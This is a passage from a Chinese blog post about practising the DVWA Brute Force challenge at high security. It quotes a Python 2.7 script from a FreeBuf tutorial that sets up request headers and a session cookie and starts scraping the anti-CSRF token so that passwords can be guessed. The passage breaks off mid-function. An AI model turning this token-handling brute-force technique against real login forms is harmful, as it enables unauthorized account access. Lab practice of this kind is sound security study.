序言
最近一段时间在练习DVWA,参考网上的教程练习,在其中遇到了一些问题,在解决问题的过程中栽了一个又一个的坑,最后终于解决,遂写此博客。
原教程
原教程是发表在freebuf上的文章,连接如下:
新手指南:DVWA-1.9全级别教程之Brute Force
在high级别的教程中,作者采用了编程的方法去爆破密码
原教程环境
此DVWA版本为1.9,根据原作者描述,其python版本为2.7,其余环境版本不明
原教程代码
from bs4 import BeautifulSoup
import urllib2
header={
'Host': '192.168.153.130',
'Cache-Control': 'max-age=0',
'If-None-Match': "307-52156c6a290c0",
'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
'Accept': '*/*',
'Referer': 'http://192.168.153.130/dvwa/vulnerabilities/brute/index.php',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cookie': 'security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2'}
requrl = "http://192.168.153.130/dvwa/vulnerabilities/brute/"
def get_token(requrl,header):
req = urllib2.Request(url=requrl,headers=header)
response = urllib2.urlopen(req)
print response.getcode(),
the_page = response.read()
print len